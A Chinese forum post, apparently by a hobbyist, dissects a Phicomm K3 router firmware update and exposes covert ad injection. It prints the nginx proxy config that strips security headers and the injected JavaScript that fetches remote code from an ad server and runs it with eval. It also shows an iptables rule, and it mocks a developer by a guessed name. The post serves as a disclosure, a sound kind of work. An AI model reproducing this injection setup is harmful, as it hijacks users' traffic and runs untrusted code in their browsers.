|
本帖最后由 ikbszj75089 于 2018-11-22 20:52 编辑
非专业人士,没功夫深入研究分析,仅供参考
首先,抓包获取固件链接:
http://power.qiqizz.com/img/SW_K3_703005003_V21.6.14.122.bin
看见没,域名都不再是熟悉的斐讯了,服务器变卖了?哈哈~
样本MD5:59708fe297ad619910e5943bf2b963f4
固件版本:V21.6.14.122
编译日期:2018年11月19日
此次换了一个工作人员编译,工作目录 /home/qingru.meng/work/,说明他的中文名mengqingru?mengqingru 你妈喊你回家吃饭!
使用7zip右键打开就可以查看固件文件系统了,发现相对于V21.6.14.109的变化:
web服务端改换成nginx,/usr/sbin/nginx 和 /usr/sbin/nginx_op 两个nginx进程
/etc/nginx/nginx.conf 配置文件:
user root;
worker_processes 2;
#error_log /tmp/usr/nginx/logs/error.log notice;
error_log /dev/null;
pid /var/lib/nginx/nginx.pid;
events {
worker_connections 2048;
}
http {
map_hash_bucket_size 64;
map $sent_http_content_type $expires {
default 3600;
text/html 3600;
text/javascript 3600;
application/javascript 3600;
application/x-javascript 3600;
}
include mime.types;
default_type application/octet-stream;
#sendfile on;
#keepalive_timeout 10;
proxy_ignore_client_abort on;
client_body_temp_path /var/lib/nginx/client_body_temp;
client_max_body_size 1000m;
proxy_temp_path /var/lib/nginx/proxy_temp;
fastcgi_temp_path /var/lib/nginx/fastcgi_temp;
uwsgi_temp_path /var/lib/nginx/uwsgi_temp;
scgi_temp_path /var/lib/nginx/scgi_temp;
access_log off;
map $request_method $purge_method {
PURGE 1;
default 0;
}
map $host $allow {
default 1;
}
server{
resolver 127.0.0.1;
resolver_timeout 200s;
listen 0.0.0.0:8080;
location / {
root html;
index index.html index.htm;
proxy_pass $scheme://$host$request_uri;
proxy_set_header HOST $http_host;
proxy_buffering off;
proxy_buffers 256 4k;
proxy_max_temp_file_size 0k;
proxy_connect_timeout 300;
proxy_send_timeout 600;
proxy_read_timeout 600;
proxy_next_upstream error timeout invalid_header http_502;
proxy_set_header Accept-Encoding "";
proxy_redirect off;
#proxy_cache cache_zone;
#proxy_cache_valid 200 302 1m;
#proxy_cache_valid 301 1m;
#proxy_cache_valid any 1m;
proxy_ignore_headers Cache-control;
proxy_hide_header Cache-control;
proxy_ignore_headers Expires;
proxy_hide_header Expires;
proxy_hide_header X-XSS-Protection;
proxy_hide_header X-WebKit-CSP;
proxy_hide_header X-Content-Type-Options;
proxy_hide_header X-Content-Security-Policy;
proxy_hide_header Content-Security-Policy;
#proxy_cache_type_valid $expires;
#expires $expires;
gunzip off;
#gunzip_buffers 16 8k;
gzip off;
#gzip_proxied any;
gzip_min_length 1k;
gzip_buffers 4 16k;
gzip_http_version 1.0;
gzip_comp_level 2;
gzip_types text/plain application/x-javascript text/javascript application/javascript application/css text/css application/xml text/ javascript application/x-httpd-php image/jpeg image/gif image/png;
gzip_vary off;
gzip_disable "MSIE [1-6]\.";
sub_filter_once on;
sub_filter_fixed 'text/html' '</body>' '</body>';
phi_request_enable on;
phi_request_server "maapi.3g.qq.com";
phi_request_port "8080";
phi_request_command "/v1/queryUrl";
phi_request_content_type 'text/html';
phi_request_white_url efrouter.sparta.html5.qq.com;
#phi_request_white_url devmaapi.3g.qq.com;
phi_request_white_url '\S*.3g.qq.com';
phi_request_white_url '\S*.baidu.com';
phi_request_white_loc '[^?]*.ico|[^?]*.js|[^?]*.css|[^?]*.jpeg|[^?]*.jpg|[^?]*.png';
if ($allow ~ ^0){
return 403;
}
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
}
}
nginx加载的广告劫持接口文件 /etc/nginx/ij.js 如下:
;(function () {
if(window.top !== window) return;
if(window.hasexecinjectjs) { return; };
window.hasexecinjectjs = true;
window.veryroutermac='%ROUTERMAC%';
var daytime = new Date(new Date().setHours(0, 0, 0, 0)) / 1000;
var url = 'https://waic.withad.cn/ads.4ldqpe3.js?_=' + daytime;
if (window.XMLHttpRequest) {
var xhr = new XMLHttpRequest();
xhr.open('GET', url);
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200) {
var text = xhr.responseText
eval(text);
}
}
xhr.send(null);
return;
}
var script=document.createElement('script');
script.src = url;
document.head && document.head.appendChild(script);
})();
/usr/sbin/nginx_op 发现TR069字符,并且在防火墙插入了一条:
iptables -t nat -i PREROUTING -i br0 -p tcp -d 101.95.50.0/24 -j ACCEPT
接受IP 101.95.50.* 归属为上海的tcp连接
fw_version hw_id et0macaddr product_id
通过固件种类、版本、mac地址的服务器精确控制广告展现?
斐讯啊斐讯,真不知道该说什么了。
nginx插广告为新增的方法,旧版固件采用 up_script 插入,历史相关帖子:
https://www.right.com.cn/forum/thread-227504-1-1.html
https://www.right.com.cn/forum/thread-240926-1-1.html
|
|